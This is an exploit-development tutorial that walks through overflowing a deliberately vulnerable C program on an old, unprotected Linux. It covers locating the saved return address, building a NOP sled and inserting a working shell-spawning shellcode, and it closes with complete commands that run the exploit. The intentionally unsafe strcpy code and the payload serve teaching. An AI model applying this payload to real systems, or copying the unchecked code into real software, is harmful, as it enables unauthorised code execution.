Buffer overflow exploit development

Buffer overflow exploits leverage a particular type of software bug in which a buffer being read or written is not properly bounds-checked. Normally, input larger than the buffer leads to a fault or a crash. The art of exploit development, however, is to craft input that does not crash the program but instead leads to arbitrary command execution. A hacking experience such as the one you had in my Remote Hacking with Metasploit article shows how devastating a buffer overflow exploit can be, but you are not a real hacker until you are armed with the knowledge of exploit development.

What is a basic buffer overflow vulnerability?

There are tons of buffer overflow exploit tutorials, and even books, that teach the basic concepts of buffer overflow exploits. A good example is this presentation on the basic concepts of buffer overflows from syssec. I strongly recommend reading that PowerPoint presentation first and then the rest of this exploit development tutorial. From here on I assume that you have read it, or that you already have a basic understanding of what a buffer overflow is and why it can lead to arbitrary code execution.

Which programming languages should I know for exploit development?

To identify a large share of buffer overflow vulnerabilities through static code analysis you should be experienced in C and C++, and in particular comfortable with pointers. Besides C, a deep knowledge of assembly is also required. Assembly is needed for shellcode development as well (don’t worry, you will learn what shellcode is by the end of this article). Writing the exploit itself does not require any particular programming language, although developing exploits with Metasploit is strongly recommended. Finally, a scripting language such as Python or Perl can save you a lot of time, first for fuzzing to detect the buffer overflow vulnerability and then for writing a code snippet that runs the exploit automatically.

Buffer overflow example

In my Buffer overflow example article I introduced several buffer overflow examples in C. Here is a basic example of an unchecked buffer that can lead to a buffer overflow exploit:

#include <stdio.h>

#include <string.h>

int main(int argc, char *argv[]) {

                int value = 5;

                char buffer_one[8], buffer_two[8];

 

                strcpy(buffer_one, "one"); /* put "one" into buffer_one */

                strcpy(buffer_two, "two"); /* put "two" into buffer_two */

               

                printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);

                printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);

                printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);

 

                printf("\n[STRCPY] copying %zu bytes into buffer_two\n\n", strlen(argv[1])); /* strlen returns size_t, so use %zu */

                strcpy(buffer_two, argv[1]); /* copy first argument into buffer_two */

 

                printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);

                printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);

                printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value);

}

 

The Art of Exploitation - overflow_example.c

Here buffer_two is 8 bytes long, but no size check is performed before argv[1] is copied into it. This means you can pass 16 or more bytes and cause a buffer overflow. If you compile and run this small program, you will see the effect of a buffer overflow: buffer_one is overwritten by the extra bytes. Surprised? Don’t be. If you have read the basic concepts behind buffer overflows, you know that the stack grows down. In this example that means the variable declared later (buffer_two) is placed at a lower address than the one declared before it (buffer_one), so bytes written past the end of buffer_two run into buffer_one. If you pass an even longer string, the program crashes, usually with a segmentation fault. The goal of exploit development (for buffer overflows specifically) is to leverage this bug and receive a shell or command prompt instead of a segmentation fault or program crash. How fun will that be, right? Be patient, we will get to that point. But first let’s review the requirements for exploit development.
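The effect described above can be modelled without touching real memory. The following Python sketch is only an illustration: it assumes a frame in which buffer_two sits at the lowest offset, buffer_one directly above it and value above that. The offsets and the helper names (new_frame, unchecked_strcpy, c_string) are hypothetical and not taken from the compiled program.

```python
import struct

# Assumed layout, lowest address first: buffer_two, buffer_one, value.
BUF_TWO, BUF_ONE, VALUE = 0, 8, 16


def new_frame():
    """Build a 20-byte model of the three local variables."""
    mem = bytearray(20)
    mem[BUF_ONE:BUF_ONE + 4] = b"one\x00"
    mem[BUF_TWO:BUF_TWO + 4] = b"two\x00"
    struct.pack_into("<i", mem, VALUE, 5)
    return mem


def unchecked_strcpy(mem, dest, src):
    """Copy src plus a terminating NUL with no bounds check, like strcpy."""
    data = src + b"\x00"
    mem[dest:dest + len(data)] = data


def c_string(mem, start):
    """Read bytes from start up to the first NUL, like printf("%s")."""
    end = mem.index(b"\x00", start)
    return bytes(mem[start:end])


frame = new_frame()
unchecked_strcpy(frame, BUF_TWO, b"1234567890")  # 10 bytes into an 8-byte buffer
print(c_string(frame, BUF_TWO))  # b'1234567890'
print(c_string(frame, BUF_ONE))  # b'90'
```

The two extra bytes land in buffer_one, which is why the real program prints a changed buffer_one after the copy.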

Operating system requirements for exploit experimentation

Ten years ago, exploit writing was much easier than it is now, because most of today’s protections and security mechanisms against buffer overflows did not exist. If you are eager to know how simple vulnerable code can be exploited on modern operating systems such as Windows 7 or Windows 8, be patient and read the articles in the Exploitation category, especially the Bypass ASLR, DEP and Stack Canary protections article. For now, to understand the concept, download an old OS such as Ubuntu 7.04 (Feisty Fawn) that has little to no protection mechanisms. On such an operating system you can see the feasibility of exploitation and learn the basic exploit development concepts, and then gradually build up your knowledge to hack on modern operating systems.

Why can buffer overflows lead to arbitrary code execution?

To answer this question we must know how a program is executed. A program is a collection of functions, and depending on the program’s algorithm, the main function calls other functions. The main function is the entry point of an application: when you launch an executable, the statements in main are executed one by one. A statement can be a call to a function, and the called function can in turn call another function. These calls can nest to an arbitrary depth, so how does the system keep track of which instruction to execute next? In other words, once a function finishes, how does the processor know which instruction follows the call? A fast way to keep this information is to store the address of the next instruction in the same place as the function’s local variables and parameters. That place is the stack, and to see its structure I again recommend reading this presentation. The “next instruction address”, also called the return address, is stored above all of the function’s local variables, that is, at a higher address. This means that any buffer in a function that is vulnerable to overflow sits beneath the saved Extended Instruction Pointer (EIP). In other words, an overflow of any local buffer in a function can potentially overwrite the return address, the saved EIP, on the stack.
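To make the relationship between a local buffer and the saved EIP concrete, here is a small Python model. It is a sketch under stated assumptions, not a dump of a real stack: it assumes an 8-byte buffer followed directly by a 4-byte saved frame pointer and a 4-byte saved EIP, and the original return address 0x08048456 is an invented value.

```python
import struct

BUFFER_SIZE = 8
SAVED_EIP = BUFFER_SIZE + 4  # assumed: buffer, then saved EBP, then saved EIP


def make_frame(return_address):
    """Model one stack frame as bytes, lowest address first."""
    frame = bytearray(BUFFER_SIZE + 8)
    struct.pack_into("<I", frame, SAVED_EIP, return_address)
    return frame


def copy_unchecked(frame, data):
    """Write data at the start of the buffer without any length check."""
    frame[0:len(data)] = data


def saved_eip(frame):
    """Read the 32-bit return address stored in the frame."""
    return struct.unpack_from("<I", frame, SAVED_EIP)[0]


frame = make_frame(0x08048456)      # hypothetical original return address
copy_unchecked(frame, b"A" * 8)     # fits in the buffer
print(hex(saved_eip(frame)))        # 0x8048456
copy_unchecked(frame, b"A" * 16)    # 8 bytes too many
print(hex(saved_eip(frame)))        # 0x41414141
```

As long as the input fits in the buffer the return address is untouched. Once the input is long enough, the function would return to whatever the input contains.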

How can we successfully overwrite the EIP?

If you have played with the buffer overflow example, you have seen that making the input longer eventually crashes the program. When that crash happens, you have most likely overwritten the saved EIP. For successful exploitation, however, you need to know exactly how many bytes it takes to reach the saved EIP. I introduce two methods here: the first uses a debugger and the second uses experimentation.

Finding the exact bytes to overwrite the EIP using a debugger

In this method we know the value of the saved EIP and only want to see how far it is from our buffer. Let’s modify the buffer overflow example a little:

#include <stdio.h>

#include <string.h>

void copy_buffer(char buffer[],char argv[]) {

                strcpy(buffer, argv);

}

 

int main(int argc, char *argv[]) {

                int value = 5;

                char buffer_one[8], buffer_two[8];

 

                strcpy(buffer_one, "one"); /* put "one" into buffer_one */

                strcpy(buffer_two, "two"); /* put "two" into buffer_two */

               

                printf("[BEFORE] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);

                printf("[BEFORE] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);

                printf("[BEFORE] value is at %p and is %d (0x%08x)\n", &value, value, value);

 

                printf("\n[STRCPY] copying %zu bytes into buffer_two\n\n", strlen(argv[1])); /* strlen returns size_t, so use %zu */

                copy_buffer(buffer_two, argv[1]); /* copy first argument into buffer_two */

 

                printf("[AFTER] buffer_two is at %p and contains \'%s\'\n", buffer_two, buffer_two);

                printf("[AFTER] buffer_one is at %p and contains \'%s\'\n", buffer_one, buffer_one);

                printf("[AFTER] value is at %p and is %d (0x%08x)\n", &value, value, value);

}

 

The only difference is that we use the copy_buffer function to copy the program argument. We know that the next statement after the call to copy_buffer is on line 41, so when the function finishes, execution should return to the address of that instruction. By setting a breakpoint on the copy_buffer call in main and examining the address of the instruction that follows it, we know which value to look for on the stack inside copy_buffer. The simplest approach is to set another breakpoint on line 9, just before copy_buffer returns, then examine the stack (64 bytes or more) and see where the return address and our input are located. That’s it: the distance between these two addresses is the exact number of bytes required to reach the saved EIP.
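The distance calculation itself is plain subtraction. The sketch below uses two hypothetical addresses of the kind you would read off the stack dump in the debugger; neither value comes from a real run, and bytes_to_saved_eip is an illustrative helper name.

```python
def bytes_to_saved_eip(buffer_address, saved_eip_address):
    """Number of filler bytes needed before the saved EIP is reached."""
    distance = saved_eip_address - buffer_address
    if distance < 0:
        raise ValueError("the saved EIP is expected above the buffer")
    return distance


# Hypothetical values read from the debugger.
buffer_address = 0xbffff7e0     # where our input starts
saved_eip_address = 0xbffff7fc  # where the return address is stored

offset = bytes_to_saved_eip(buffer_address, saved_eip_address)
print(offset)  # 28
```

With these example numbers, 28 filler bytes reach the saved EIP, and the next four bytes of input replace it.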

Finding the exact bytes to overwrite the EIP by experimentation

The goal here is to automate running the program with inputs of different lengths and see when it crashes. A Python script can easily do this, but here I show you a Linux Bash script instead:

 

$ for i in $(seq 1 100)
> do
> echo Trying offset $i
> ./a.out $(perl -e "print 'AAAA'x$i")
> done

 

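The first iteration that ends in a segmentation fault gives you the offset, counted here in blocks of four bytes.

Once you know the offset, repeating AAAA that many times overwrites the saved EIP with the value 0x41414141. You can confirm this by checking the value of EIP in a debugger after the crash.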
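As mentioned, the same search can be written in Python. The following is a minimal sketch, assuming a POSIX system where a process killed by a signal reports a negative return code. The function names are illustrative, and ./a.out is the vulnerable test program from this tutorial.

```python
import signal
import subprocess


def crashed_with_segv(program, argument):
    """Run program with one argument and report whether it died from SIGSEGV."""
    result = subprocess.run(
        [program, argument],
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )
    return result.returncode == -signal.SIGSEGV


def first_crashing_count(crashes, max_count=100, word=b"AAAA"):
    """Return the smallest repeat count of word for which crashes(...) is true."""
    for count in range(1, max_count + 1):
        if crashes(word * count):
            return count
    return None


# Usage against the local test binary (not executed here):
#   count = first_crashing_count(lambda data: crashed_with_segv("./a.out", data))
#   print("first crash at", count, "repetitions of AAAA")
```

Passing the crash check in as a function keeps the search loop separate from the process handling, so the loop can be tried with a stand-in before pointing it at a real binary.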

How can we execute our arbitrary command by overwriting the EIP?

Overwriting the saved EIP with a valid address of your choice redirects execution to the code you want. You may immediately ask: redirect execution to where? You are writing to a buffer, remember? So you do not only overflow the buffer to overwrite the saved EIP on the stack, you also write your own code into that buffer. The only remaining barrier is to find the address of the buffer you overflow, so that you can write that address over the saved EIP and, bam, the program executes the code you supplied as input! This code is known as SHELLCODE.

What is a NOP slide?

Finding the address of the buffer into which you inject the SHELLCODE is not that easy. Many factors can change the buffer’s address from one situation to another. Moreover, the address must point exactly to the beginning of the SHELLCODE: if any factor shifts the address by even one byte, the SHELLCODE is not executed correctly and the program crashes. To reduce the difficulty of finding the exact return address (the address of the buffer), we place NOP instructions in front of the SHELLCODE. When the CPU sees a NOP instruction it simply does nothing and moves on to the next instruction. Thus, if something shifts, the address still points somewhere among the NOP instructions (known as a NOP slide or NOP sled), and the CPU executes one NOP after another until it reaches the SHELLCODE. The layout of our exploit is shown in Figure 1:

Figure 1: Layout of a buffer overflow exploit
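Since the figure may not be visible, the layout can also be written down as byte ranges. The sketch below only does the arithmetic. The sizes in the example call (a 200-byte NOP sled, a 35-byte SHELLCODE and 10 repeated 4-byte addresses) are the ones used later in this tutorial, and describe_layout is a hypothetical helper name.

```python
def describe_layout(nop_count, shellcode_len, address_repeats, address_size=4):
    """Return (name, start, end) for each part of the input, in order."""
    parts = [
        ("NOP sled", nop_count),
        ("SHELLCODE", shellcode_len),
        ("repeated return address", address_repeats * address_size),
    ]
    layout = []
    offset = 0
    for name, length in parts:
        layout.append((name, offset, offset + length))
        offset += length
    return layout


for name, start, end in describe_layout(200, 35, 10):
    print(f"{name:<24} bytes {start:>3} to {end - 1:>3}")
```

With these sizes the whole input is 275 bytes long, and any return address that points into the first 200 bytes slides down to the SHELLCODE.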

How do we find the return address that points to the SHELLCODE?

The quick answer is to use a debugger to find the address of the buffer that holds the input. When you audit open source code, or a simple example like the one in this tutorial, you can easily find the address by using the variable name in the debugger.

In Linux, gdb is the best tool, and the task is as easy as attaching to the process:

gdb -q --pid=[PROCESS-ID] --symbols=[OUTPUT-FILE]

The process ID can be retrieved with the ps command, and the output file is whatever name you gave the binary when compiling with gcc. After attaching to the process you can get the address of the buffer with this command:

x/x [VARIABLE-NAME]

 

In Windows, it is even easier with WinDbg or Immunity Debugger. You must first place your .pdb file in a known location and point to it using this menu:

File-->Symbol File path

Then attach to the process using this menu:

File-->Attach to process

Finally, view the variable’s address using:

View-->Watch

Here you type the name of your variable.

If you have neither the symbol file nor the source code, don’t worry! You can search memory for your input and retrieve the address of the beginning of the buffer. For example, in WinDbg with Mona.py installed, finding an AAAAAAAAA input pattern is as easy as:

!mona find -type asc -s "AAAAAAAAA"

SHELLCODE

Figure 2 shows a SHELLCODE:

Figure 2: SHELLCODE

These bytes, if executed, spawn a shell for you. To be executed, they must be injected into the program preceded by the NOP sled. One important factor for successful exploitation is the length of the vulnerable buffer. You can overflow a buffer and overwrite the saved EIP even with an 8-byte buffer such as the one in our buffer overflow example, though that takes a lot of experience and knowledge. We want to place our NOP sled + SHELLCODE in the buffer, so the buffer should be at least that big. For this reason we modify our buffer overflow example like this:

#include <string.h>

int main(int argc, char *argv[]) {

                int value = 5;

                char buffer_one[8], buffer_two[250];

                strcpy(buffer_two, argv[1]); /* copy first argument into buffer_two */

}

 

Now our vulnerable buffer is big enough that we can pass input consisting of our NOP sled + SHELLCODE + Repeated Return Address.

Building the exploit

OK, so far you have seen a program that is vulnerable to a buffer overflow exploit. Then you learned that a vulnerable buffer allows you to overwrite the return address on the stack. Next you learned that you can deliberately overwrite the return address so that it points to a SHELLCODE you place in the buffer. Finally, you learned how to find the address of the SHELLCODE in the buffer and how to add some NOPs to make the guess more forgiving. Now it is time to see how we build an exploit using this information.

In Linux we build the NOP sled like this:

$(perl -e 'print "\x90"x200')

This builds 200 consecutive NOP instructions for us.

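Then we build our SHELLCODE like this:

export SHELLCODE=$(printf "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80")

The string is the hexadecimal representation of the machine code that spawns a shell for us. It is written as a single quoted string on one line, because a line break inside the command substitution would make the shell treat the rest as a separate command.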

Next, assuming the address of the vulnerable buffer is 0xbffff5c0, we repeat the address 0xbffff624 10 times. That’s right, we do not repeat the buffer address itself but 0xbffff5c0 + 100, because 100 bytes into the buffer we are in the middle of the NOP instructions, which makes it a safe guess even if the buffer address shifts slightly. Why 10 times? That depends on the buffer length (here 250), the NOP sled size and the offset from the buffer to the saved EIP. The repeated addresses must also line up with the 4-byte slot that holds the saved EIP; if they do not, lengthen or shorten the NOP sled by one to three bytes. Remember that the goal is to overflow the buffer and overwrite the saved EIP, so if 10 does not work for you, run the Bash script again to find the offset and calculate how many repeated return addresses you need:

$(perl -e 'print "\x24\xf6\xff\xbf"x10')

Did you notice? The address bytes are in reverse order! That’s because the 32-bit Intel architecture, on which our Ubuntu 7.04 (Feisty Fawn) runs, is little endian, which means the least significant byte is stored at the lowest address.
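The address arithmetic and the byte order are easy to check with a few lines of Python. This is only a sketch: the buffer address 0xbffff5c0 is the assumed value from the text above, and pack_le32 is an illustrative helper built on the standard struct module.

```python
import struct


def pack_le32(address):
    """Encode a 32-bit address as four bytes, least significant byte first."""
    return struct.pack("<I", address)


buffer_address = 0xbffff5c0            # assumed buffer address from the text
return_address = buffer_address + 100  # lands in the middle of the NOP sled

print(hex(return_address))              # 0xbffff624
print(pack_le32(return_address).hex())  # 24f6ffbf
```

The second line of output matches the byte order needed in the perl command: 24, f6, ff, bf.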

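Finally our exploit can be run. Note that there is no space between the three parts, so the whole exploit reaches the program as a single argument:

./a.out $(perl -e 'print "\x90"x200')$(echo $SHELLCODE)$(perl -e 'print "\x24\xf6\xff\xbf"x10')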

 

Or the exploit can be saved in an environment variable like this:

export EXPLOIT=$(perl -e 'print "\x90"x200')$(echo $SHELLCODE)$(perl -e 'print "\x24\xf6\xff\xbf"x10')

 

You can also save the exploit to a file:

echo $EXPLOIT > example_exploit

 

You can then run the exploit later with:

./a.out $(echo $EXPLOIT)

 

Or:

./a.out $(cat example_exploit)

 

 

Read 1078 times Last modified on Saturday, 01 August 2015 17:37